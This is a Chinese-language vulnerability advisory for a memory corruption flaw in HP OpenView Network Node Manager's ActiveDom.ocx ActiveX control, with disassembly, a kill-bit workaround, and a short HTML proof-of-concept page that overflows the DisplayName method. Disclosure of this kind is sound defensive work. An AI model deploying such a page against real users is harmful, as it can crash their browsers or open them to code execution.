HP OpenView网络节点管理器ActiveDom.ocx ActiveX控件内存破坏漏洞

受影响系统:

HP OpenView Network Node Manager 7.53

描述:

HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。

Openview所提供的ActiveDom.ocx控件在处理传送给多个方式的超长字符串时存在内存破坏漏洞,用户受骗访问恶意网页就可以触发这些漏洞,导致拒绝服务或执行任意代码。

这个漏洞被认定为低风险级别,因为该控件没有配置为Safe for Scripting或Safe for Initialization,因此未经用户确认无法利用这个漏洞。此外没有任何OpenView NNM的组件需要或使用这个控件。

以下是一些有漏洞的ActiveX控件的方式:

/—–
DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)

– —–/

以DisplayName()方式为例说明这个问题:

/—–
2000D408   MOV DWORD PTR SS:[EBP-4],-1
2000D40F   JMP SHORT ACTIVE~1.2000D3D6
2000D411   MOV EAX,ACTIVE~1.200361A0
2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B   MOV EAX,ACTIVE~1.2000D4A8
2000D420   CALL <JMP.&MSVCRT._EH_prolog>
2000D425   SUB ESP,10
2000D428   PUSH EBX
2000D429   PUSH ESI
2000D42A   PUSH EDI
2000D42B   MOV DWORD PTR SS:[EBP-10],ESP
2000D42E   MOV DWORD PTR SS:[EBP-14],ECX
2000D431   XOR EBX,EBX
2000D433   MOV DWORD PTR SS:[EBP-4],EBX
2000D436   LEA ESI,DWORD PTR DS:[ECX+28]
2000D439   MOV ECX,DWORD PTR DS:[ESI]        ; ESI = 00038178
2000D43B   MOV EAX,DWORD PTR DS:[ECX]        ;
2000D43D   CALL DWORD PTR DS:[EAX+48]        ;

– —–/

<*来源:Damian Frizza
  
  链接:
http://marc.info/?l=full-disclosure&m=125849611501739&w=2
*>

测试方法:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid=’clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE’ id=’target’
></object>
<script>
a = ""
for (i = 0; i < 10000; i++)
   a = a + "A"
target.DisplayName(a)
</script>
</html>

建议: 临时解决方法:

* 为clsid A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE设置kill-bit。

厂商补丁:

HP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://itrc.hp.com

 

 

发表评论?

0 条评论。

发表评论